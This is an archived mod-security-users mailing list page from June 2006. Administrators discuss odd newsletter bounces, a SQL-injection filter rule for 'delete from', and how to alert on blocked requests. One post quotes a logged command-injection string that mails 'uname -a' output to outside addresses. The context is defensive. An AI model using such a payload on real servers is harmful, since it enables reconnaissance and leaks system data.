Screenshot instructions:
Windows
Mac
Red Hat Linux
Ubuntu
Click URL instructions:
Right-click on ad, choose "Copy Link", then paste here →
(This may not be possible with some types of ads)
You can subscribe to this list here.
| 2003 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
(2) |
Jul
(17) |
Aug
(7) |
Sep
(8) |
Oct
(11) |
Nov
(14) |
Dec
(19) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2004 |
Jan
(46) |
Feb
(14) |
Mar
(20) |
Apr
(48) |
May
(15) |
Jun
(20) |
Jul
(36) |
Aug
(24) |
Sep
(31) |
Oct
(28) |
Nov
(23) |
Dec
(12) |
| 2005 |
Jan
(69) |
Feb
(61) |
Mar
(82) |
Apr
(53) |
May
(26) |
Jun
(71) |
Jul
(27) |
Aug
(52) |
Sep
(28) |
Oct
(49) |
Nov
(104) |
Dec
(74) |
| 2006 |
Jan
(61) |
Feb
(148) |
Mar
(82) |
Apr
(139) |
May
(65) |
Jun
(116) |
Jul
(92) |
Aug
(101) |
Sep
(84) |
Oct
(103) |
Nov
(174) |
Dec
(102) |
| 2007 |
Jan
(166) |
Feb
(161) |
Mar
(181) |
Apr
(152) |
May
(192) |
Jun
(250) |
Jul
(127) |
Aug
(165) |
Sep
(97) |
Oct
(135) |
Nov
(206) |
Dec
(56) |
| 2008 |
Jan
(160) |
Feb
(135) |
Mar
(98) |
Apr
(89) |
May
(115) |
Jun
(95) |
Jul
(188) |
Aug
(167) |
Sep
(153) |
Oct
(84) |
Nov
(82) |
Dec
(85) |
| 2009 |
Jan
(139) |
Feb
(133) |
Mar
(128) |
Apr
(105) |
May
(135) |
Jun
(79) |
Jul
(92) |
Aug
(134) |
Sep
(73) |
Oct
(112) |
Nov
(159) |
Dec
(80) |
| 2010 |
Jan
(100) |
Feb
(116) |
Mar
(130) |
Apr
(59) |
May
(88) |
Jun
(59) |
Jul
(69) |
Aug
(67) |
Sep
(82) |
Oct
(76) |
Nov
(59) |
Dec
(34) |
| 2011 |
Jan
(84) |
Feb
(74) |
Mar
(81) |
Apr
(94) |
May
(188) |
Jun
(72) |
Jul
(118) |
Aug
(109) |
Sep
(111) |
Oct
(80) |
Nov
(51) |
Dec
(44) |
| 2012 |
Jan
(80) |
Feb
(123) |
Mar
(46) |
Apr
(12) |
May
(40) |
Jun
(62) |
Jul
(95) |
Aug
(66) |
Sep
(65) |
Oct
(53) |
Nov
(42) |
Dec
(60) |
| 2013 |
Jan
(96) |
Feb
(96) |
Mar
(108) |
Apr
(72) |
May
(115) |
Jun
(111) |
Jul
(114) |
Aug
(87) |
Sep
(93) |
Oct
(97) |
Nov
(104) |
Dec
(82) |
| 2014 |
Jan
(96) |
Feb
(77) |
Mar
(71) |
Apr
(40) |
May
(48) |
Jun
(78) |
Jul
(54) |
Aug
(44) |
Sep
(58) |
Oct
(79) |
Nov
(51) |
Dec
(52) |
| 2015 |
Jan
(55) |
Feb
(59) |
Mar
(48) |
Apr
(40) |
May
(45) |
Jun
(63) |
Jul
(36) |
Aug
(49) |
Sep
(35) |
Oct
(58) |
Nov
(21) |
Dec
(47) |
| 2016 |
Jan
(35) |
Feb
(81) |
Mar
(43) |
Apr
(41) |
May
(77) |
Jun
(52) |
Jul
(39) |
Aug
(34) |
Sep
(107) |
Oct
(67) |
Nov
(54) |
Dec
(20) |
| 2017 |
Jan
(99) |
Feb
(37) |
Mar
(86) |
Apr
(47) |
May
(57) |
Jun
(55) |
Jul
(34) |
Aug
(31) |
Sep
(16) |
Oct
(49) |
Nov
(53) |
Dec
(33) |
| 2018 |
Jan
(25) |
Feb
(11) |
Mar
(79) |
Apr
(73) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| S | M | T | W | T | F | S |
|---|---|---|---|---|---|---|
|
|
|
|
|
1
(8) |
2
(4) |
3
|
|
4
|
5
|
6
(2) |
7
(4) |
8
(4) |
9
(3) |
10
|
|
11
|
12
(3) |
13
(7) |
14
(1) |
15
(2) |
16
(3) |
17
|
|
18
(3) |
19
(15) |
20
(5) |
21
(5) |
22
(8) |
23
(10) |
24
(3) |
|
25
(1) |
26
(7) |
27
(6) |
28
|
29
(6) |
30
(6) |
|
|
From: Ivan Ristic <ivan.ristic@gm...> - 2006-06-20 20:27:14
|
On 6/20/06, Dick Schiferli <dicks@...> wrote: > Hi everyone, > > I has posted a message related to this before but the fix I implemented did > not work. So here another try, hope someone can help. > > We use a newsletter system on our server called FUMP from http://www.sellwide.com. > It is a purchased solution. In our htaccess we have form protection and a > lot more. > > This application consists of a file called "responder.cgi" that is embedded > on our php pages and captures the newsletter signup information. Then there > is a bounced.cgi that checks the POP3 box for bounced emails (when people > sign up for fun). There is a bounced email address defined in the > application where all bounced emails are returned to. The application picks > them up and processes them. > > Now here is what can be seen: > > 1. In the bounced email list of the newsletter app there are emails from the > root domain of my server (with error 5.0.0). Most of them have only one > letter in front of @, latin and chinese. These are not from people that > signed up. > 2. There are no logs in modsecurity of script attacks to the two cgi scripts > mentioned above. > 3. Even if I block the root domain name in modsecurity the emails still > appear (even with secfilter). > 4. If I block the root domain in the newsletter account, the strange bounced > emails still appear in the bounced list. > 5. We're not seeing that any spam emails are sent from our server. > > I'd like to find out how this can happen and how to prevent it (assuming it > is harmful). I've informed the company of this application too. Does anyone > have an idea where and how to look? I suspect the email field in the submitted form is an incomplete email address (e.g. "ivanr"). When an attempt is made to send an email to such address (on Unix) the mail server will assume you are trying to send to (from) the local user, in which case it will append the default domain name. That would explain why the rule isn't working. To confirm or deny this you'd need to look at the audit log entry, find the parameter that is support to transport the email address and determine if there's a complete email address there or not. Let us know. -- Ivan Ristic, Technical Director Thinking Stone, http://www.thinkingstone.com ModSecurity: Open source Web Application Firewall |
|
From: Dick Schiferli <dicks@sc...> - 2006-06-20 13:03:24
|
Hi everyone, I has posted a message related to this before but the fix I implemented did not work. So here another try, hope someone can help. We use a newsletter system on our server called FUMP from http://www.sellwide.com. It is a purchased solution. In our htaccess we have form protection and a lot more. This application consists of a file called "responder.cgi" that is embedded on our php pages and captures the newsletter signup information. Then there is a bounced.cgi that checks the POP3 box for bounced emails (when people sign up for fun). There is a bounced email address defined in the application where all bounced emails are returned to. The application picks them up and processes them. Now here is what can be seen: 1. In the bounced email list of the newsletter app there are emails from the root domain of my server (with error 5.0.0). Most of them have only one letter in front of @, latin and chinese. These are not from people that signed up. 2. There are no logs in modsecurity of script attacks to the two cgi scripts mentioned above. 3. Even if I block the root domain name in modsecurity the emails still appear (even with secfilter). 4. If I block the root domain in the newsletter account, the strange bounced emails still appear in the bounced list. 5. We're not seeing that any spam emails are sent from our server. I'd like to find out how this can happen and how to prevent it (assuming it is harmful). I've informed the company of this application too. Does anyone have an idea where and how to look? Thanks Dick |
|
From: Bram Biesbrouck <b@be...> - 2006-06-20 12:40:00
|
Hi all, I was wondering if the following rule: SecFilterSelective ARGS "delete[[:space:]]+from" also triggers when SQL-injection is performed with the SQL-query in uppercase (DELETE FROM table)? If not, perhaps the modsecurity-general.conf, etc rules should be updated? Bram |
|
From: Ryan Barnett <rcbarnett@gm...> - 2006-06-20 11:28:31
|
For alerting purposes, I use CGI scripts. In my modsecurity default action directive, I specify a 403 Forbidden status code. I then use the Apache ErrorDocument directive to point to a CGI script. The CGI script will present the client with an error message webpage and then send an email to the security folks. The email contains a CGI ENV dump of all of the session tokens (same output as the printenv cgi script). So essentially, the email that I receive a snapshot of the attacker's request ENV. I also add in some weblinks to helpful public websites for tracking down the client's location/whois info, etc... -- Ryan C. Barnett Web Application Security Consortium (WASC) Member CIS Apache Benchmark Project Lead SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC Author: Preventing Web Attacks with Apache On 6/20/06, Brent Clark <bclark@...> wrote: > > Hey all > > Using the brilliant mod_security, I came across a string with the > following in. > > mail%20-s%20uname_i2_217.199.186.118%20kkparole@...;uname%20- > a%20|%20mail%20-s%20uname_i2_217.199.186.118%20michaelroul@...; > > My questions is, what can be done to alert some security overseaer and > help stop cyber crime. > > Kind Regards > Brent Clark > > > _______________________________________________ > mod-security-users mailing list > mod-security-users@... > https://lists.sourceforge.net/lists/listinfo/mod-security-users > |
|
From: Brent Clark <bclark@ec...> - 2006-06-20 10:25:22
|
Hey all Using the brilliant mod_security, I came across a string with the following in. mail%20-s%20uname_i2_217.199.186.118%20kkparole@...;uname%20-a%20|%20mail%20-s%20uname_i2_217.199.186.118%20michaelroul@...; My questions is, what can be done to alert some security overseaer and help stop cyber crime. Kind Regards Brent Clark |